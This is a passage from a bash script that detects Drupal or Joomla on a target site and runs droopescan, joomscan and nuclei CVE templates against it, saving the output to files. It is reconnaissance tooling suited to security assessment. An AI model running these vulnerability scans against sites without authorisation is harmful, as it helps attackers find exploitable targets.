"[+] Drupal detected!" echo "[2/4] Running Droopescan..." droopescan scan drupal -u "https://$TARGET" > $OUTDIR/droopescan.txt 2>/dev/null fi # Joomla scan if [ "$JOOMLA" = "200" ] || grep -qi "joomla" $OUTDIR/whatweb.txt 2>/dev/null; then echo "[+] Joomla detected!" echo "[2/4] Running JoomScan..." joomscan -u "https://$TARGET" > $OUTDIR/joomscan.txt 2>/dev/null fi # Nuclei CMS scans echo "[3/4] Nuclei CMS scan..." nuclei -u "https://$TARGET" -t cves/wordpress/ -t cves/drupal/ -t cves/joomla/ \ -silent -o $OUTDIR/nuclei_cms.txt 2>/dev/null echo "[4/4] Complete. Results in $OUTDIR/"